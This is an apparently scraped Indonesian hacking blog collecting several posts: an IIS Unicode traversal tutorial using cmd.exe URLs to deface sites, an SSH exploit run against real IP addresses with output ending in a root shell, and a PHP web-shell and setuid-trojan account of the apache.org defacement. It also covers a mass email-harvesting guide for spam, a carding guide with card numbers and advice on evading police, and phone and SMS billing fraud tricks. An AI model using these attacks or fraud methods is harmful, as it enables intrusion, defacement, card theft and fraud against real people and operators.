Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah

mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,

index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.

Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau

D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...

Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih

lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....

truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....

http://www.targethost.com == neh yg ini......di situ kan alias di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :

Directory of C:\InetPub\wwwroot

07/20/01 03:21p 1,590 default.htm

07/20/01 03:21p 590 index.html

07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...

contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat

targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site

tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee

(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk

langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..

Kedua lewat TFTP32.

*Cara pertama :*

Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori

C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe

. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL

berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex

Diposkan oleh Dj BxxA di 01:59 0 komentar Link ke posting ini

Label: yang iseng-iseng

Cara Mendapatkan Puluhan Ribu Email

A. Gunakan software Mailcrawl (notworksolution.com) Versi gratisnya bisa menyimpan 3.000 email sekali pencarian, bisa diakali sampai bisa menyimpan 15.000 email/keyword.

Cara menggunakan :

1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia

(keluarga, uang, wanita, sukses, pertanian, militer)

2. Option :

a. thread pilih 60-80

b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)

abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe

majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster

admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing

customercare customerservice cs feedback komentar manager namaanda name username yourname

support technical service cs prohosting zzz info support technical request join berhenti

anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,

lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder

penyimpanan gabungan keyword

g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas

akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,

keyword2 dst.

3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda.

Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa

merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file

Diposkan oleh Dj BxxA di 01:58 0 komentar Link ke posting ini

Label: yang iseng-iseng

Root Attack

lebih lanjut...

1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz

2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.

3. cara penggunaan grabbb :

a. ketik ./grabbb maka akan ada help nya

b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini

terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080

- klo kita scan port 21 maka akan keliatan versi wuftpd

- klo kita scan port 22 maka akan keliatan versi ssh

- klo kita scan port 443 maka akan keliatan versi openssl

berikut contoh ssh:

66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2

66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2

66.1.213.59:22: SSH-1.5-1.2.27

66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2

66.1.217.77:22: SSH-1.5-1.2.25

setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya

4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa

sebagai contoh pemakaian saya pake x3.tar.gz

5. ./x3 -t 0

SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Targets:

( 1) Small - SSH-1.5-1.2.26

( 2) Small - SSH-1.5-OpenSSH-1.2.3

( 3) Small - SSH-1.5-1.2.31

( 4) Small - SSH-1.5-1.3.07

( 5) Small - SSH-1.99-OpenSSH_2.1.1

( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH

( 7) Small - SSH-1.5-1.2.27

( 8) Small - SSH-1.99-OpenSSH_2.2.0p1

( 9) Big - SSH-1.99-OpenSSH_2.2.0p1

(10) Big - SSH-1.5-1.2.27

(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST

(12) Big - SSH-1.5-1.2.27

6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu

66.1.213.59:22: SSH-1.5-1.2.27

7. kita coba ./x3 -t 7 66.1.213.59 22 .

SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Target: Small - SSH-1.99-OpenSSH_2.2.0p1

Attacking: 66.1.213.59:22

Testing if remote sshd is vulnerable # ATTACH NOW

YES #

Finding h - buf distance (estimate)

(1 ) testing 0x00000004 # SEGV #

(2 ) testing 0x0000c804 # FOUND #

Found buffer, determining exact diff

Finding h - buf distance using the teso method

(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #

(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED

(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #

(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #

(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #

(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #

(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #

(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #

(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #

(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #

(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #

Bin search done, testing result

Finding exact h - buf distance

(16) trying: 0x083facdc # SURVIVED #

Exact match found at: 0x00005324

Looking for exact buffer address

Finding exact buffer address

(17) Trying: 0x080c5324 # SEGV #

(18) Trying: 0x080c6324 # SEGV #

(19) Trying: 0x080c7324 # SEGV #

(20) Trying: 0x080c8324 # SEGV #

(21) Trying: 0x0810e324 # SURVIVED #

(22 Trying: 0x08088634 # OK #

Finding distance till stack buffer

Crash, finding next return address

EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02

ATTACH NOW

Changing MSW of return address to: 0x0807

Crash, finding next return address

EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02

ATTACH NOW

Changing MSW of return address to: 0x0807

Crash, finding next return address

EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02

ATTACH NOW

Changing MSW of return address to: 0x0807

Crash, finding next return address

EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02

ATTACH NOW

Changing MSW of return address to: 0x0807

********* YOU ARE IN *********

uname -a ; id

uname -a ; id

Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown

uid=48(root) gid=48(root) groups=48(root)

nah itu uah dapat, terserah mau diapakan

keterangan:

ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.

tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain

Diposkan oleh Dj BxxA di 01:55 0 komentar Link ke posting ini

Label: yang iseng-iseng

Senjata Seorang Carder

Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.

Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.

Mari kita mulai......

1.masuk ke MIRC

dari MIRC kalian join ke channel ini :

#CCPOSTS

#THACC (Dulu namanya #thecc)

sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!

2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.

3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.

4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)

5.!proxy

untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.

6.!order.log

untuk mengetahui nama,alamat dan cc number seseorang.

ini nih cuplikannya :

#ccposts

*** Now talking in #ccposts

*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'

*** Set by ^XDIrc^ on Thu May 09 02:04:28

-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands

*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , < 5437000105070603 > is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc

-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?

*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)

*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )

* DaLinuX i have root i need cc msg me for trade

!chk 373216942923005 0802

#thacc

*** Now talking in #thacc

*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'

*** Set by GSD on Fri May 03 02:11:11

!proxy

*** Parts: fc4 (~umik_o@203.147.50.12)

*** Joins: fc4 (~umik_o@203.147.50.12)

<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?׿? ?

*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)

*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802

*** e_KiNGHT-[Away] is now known as Guest53360

How I can see my card is valid

* DaLinuX i have root i need cc msg me for trade

Jelas ??!

Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak

Diposkan oleh Dj BxxA di 01:51 0 komentar Link ke posting ini

Label: yang iseng-iseng

Tip n Trik Telepon Gratis

I. Trik telphon gratis Lokal (dalam kota)

Fasilitas dan cara yang digunakan:

1. Telphone umum koin yang masih hidup

2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"

3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)

4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.

Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :

1. TERLALU BANYAK NOMOR YANG KEMBAR

2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll

3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG

4. TELKOM SEDANG KENA TROUBLE :))

II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)

Fasilitas dan cara yang digunakan:

1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)

2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)

3. Bicaralah sepuas hati dan sebengkak bibir anda

4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:

TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA

misal: tujuan 021888555000 -> bila telah selesai ketikan 021888555000 lagi

JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR

misal: tujuan 021888555000 -> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)

JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL

CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))

Diposkan oleh Dj BxxA di 01:51 0 komentar Link ke posting ini

Label: yang iseng-iseng

LINUX

Unix yang seluruh source codenya dibuat dengan bahasa C sangat memudahkan

pengembanganya sehingga dalam waktu singkat Unix dapat berkembang secara

pesat, dan terbentuklah dua aliran : yaitu Unix yang dikembangkan oleh

Universitas Berkeley dan yang dikembangkan AT&T.

Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga

terjadilah persaingan antar perusahaan untuk memegang kontrol terhadap

sistem operasi.PErsaingan ini menyebabkan perlunya sebuah standar yang baku

sehingga lahirlah proyek bernama 'POSIX' yang di motori oleh IEEE (The

Institute of Electrical and Electronics Engineers) yang akan menetapkan

spesifikasi standar Unix. ternyata, dengan adanya standar tersebut tetap

belum bisa meredakan persaingan yang timbul yang mengakibatkan munculnya

berbagai varian dari Unix.

Source code Minix yang tercipta sebagai salah satu varian Unix dan dibuat

oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan Linus

Torvalds sebagai referensi untuk membuat suatu Opeating system yang dapat

bekerja seperti Unix dalam komputer 386. Dalam pembuatan linux , Linus

memakai tool-tool dari Free Software Foundation yang berlicensi GNU. Agar

sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-

program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya

membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami

perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan

secara luas kepada publik. pada tanggal 5 Oktober 1991 linus menggumumkan

source codenya.

Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler

, GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak

perhatian seluruh programer di dunia yang akhirnya berpartisipasi untuk

ikut mengembangkan linux.

'Linux' bisa jadi merupakan proyek para hacker yang sangat berharga di

dalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya

keseluruh dunia.

Diposkan oleh Dj BxxA di 01:49 0 komentar Link ke posting ini

Label: yang iseng-iseng

BUG SMS Satelindo

Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon yang sangat merobek kantong.

GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain.

oke sampe disini preambule kita akhiri.

Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil.

Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis.

cara sebagai berikut:

1. ketik SMS

2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)

(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)

3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)

4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.

4. dapat kita liat bahwa sms kita terkirim.

5. finish

Dari sana kita bisa lakukan dengan sepuas hati.

Diposkan oleh Dj BxxA di 01:48 0 komentar Link ke posting ini

Label: yang iseng-iseng

How To Deface APACHE

/*

* Before you start reading

*/

This paper does _not_ uncover any new vulnerabilities. It points out common

(and slightly less common) configuration errors, which even the people at

apache.org made. This is a general warning. Learn from it. Fix your systems,

so we won't have to :)

/*

* introduction

*/

This paper describes how, over the course of a week, we succeeded in

getting root access to the machine running www.apache.org, and changed

the main page to show a 'Powered by Microsoft BackOffice' logo instead

of the default 'Powered by Apache' logo (the feather). No other changes

were made, except to prevent other (possibly malicious) people getting in.

Note that the problems described in this paper are not apache-related,

these were all config errors (one of 'm straight from BugZilla's README,

but the README had enough warnings so I don't blame the BugZilla developers).

People running apache httpd do not need to start worrying because of

anything uncovered herein.

We hacked www.apache.org because there are a lot of servers running apache

software and if www.apache.org got compromised, somebody could backdoor

the apache server source and end up having lots of owned boxes.

We just couldn't allow this to happen, we secured the main ftproot==wwwroot

thing. While having owned root we just couldnt stand the urge to put that

small logo on it.

/*

* ftproot == wwwroot

* o+w dirs

*/

While searching for the laters apache httpserver to diff it the with

previous version and read that diff file for any options of new buffer

overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of

the http://www.apache.org on that ftp including world writable directories.

So we wrote a little wuh.php3 including

passthru($cmd);

?>

and uploaded that to one of the world writable directories.

/*

* Our commands executed

*/

Unsurprisingly, 'id' got executed when called like

http://www.apache.org/thatdir/wuh.php3?cmd=id

Next was to upload some bindshell and compile it like calling

http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then

executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd

/*

* The shell

*/

Ofcourse we used a bindshell that first requires ppl to authenticate with

a hardcoded password (:

Now we telnet to port 65533 where we binded that shell and we have local

nobody access, because cgi is running as user nobody.

/*

* The apache.org box

*/

What did we find on apache.org box:

-o=rx /root

-o=rx homedirs

apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer

overflow or some lame exploit, goal was to reach root with only

configuration faults.

/*

* Mysql

*/

After a long search we found out that mysql was

running as user root and was reachable locally. Because apache.org was

running bugzilla which requires a mysql account and has it

username/password plaintext in the bugzilla source it was easy to

get a username/passwd for the mysql database.

We downloaded nportredird and have it set up to accept connections on

port 23306 from our ips and redir them to localhost port 3306 so we could

use our own mysql clients.

/*

* Full mysql access

* use it to create files

*/

Having gained access to port 3306 coming from localhost, using the login

'bugs' (which had full access [as in "all Y's"]), our privs where

elevated substantially. This was mostly due to sloppy reading of the BugZilla

README which _does_ show a quick way to set things up (with all Y's) but

also has lots of security warnings, including "don't run mysqld as root".

Using 'SELECT ... INTO OUTFILE;' we were now able to create files

anywhere, as root. These files were mode 666, and we could not overwrite

anything. Still, this seemed useful.

But what do you do with this ability? No use writing .rhosts files - no

sane rshd will accept a world-writable .rhosts file. Besides, rshd

wasn't running on this box.

/*

* our /root/.tcshrc

*/

Therefore, we decided to perform a trojan-like trick. We used database

'test' and created a one-column table with a 80char textfield. A couple

of inserts and one select later, we had ourselves a /root/.tcshrc with

contents similar to:

#!/bin/sh

cp /bin/sh /tmp/.rootsh

chmod 4755 /tmp/.rootsh

rm -f /root/.tcshrc

/*

* ROOT!!

*/

Quite trivial. Now the wait was for somebody to su -. Luckily, with 9

people legally having root, this didn't take long. The rest is trivial

too - being root the deface was quickly done, but not until after a

short report listing the vulnerabilities and quick fixes was build.

Shortly after the deface, we sent this report to one of the admins.

/*

* Fix that ftproot==wwwroot

*/

Another thing we did before the deface, was creating a file 'ftproot' in

the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'

and changing the ftproot to this new 'ftproot' dir, yielding the

world-writable dirs unexploitable but allowing ftp URLs to continue

working.

/*

* What could have been compromised?

*/

Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we

wanted to, we could have done the same thing to Apache. Edit the source

and have people download trojaned versions. Scary, eh?

/*

* In short:

*/

- ftproot==webroot, worldwritable dirs allowing us to upload and execute

php3 scripts

- mysqld running as root, with a FFULL RIGHTS login without a password.

/*

* Compliments for the Apache admin team

*/

We would like to compliment the Apache admin team on their swift

response when they found out about the deface, and also on their

approach, even calling us 'white hats' (we were at the most 'grey hats'

here, if you ask us).

No comments:

Post a Comment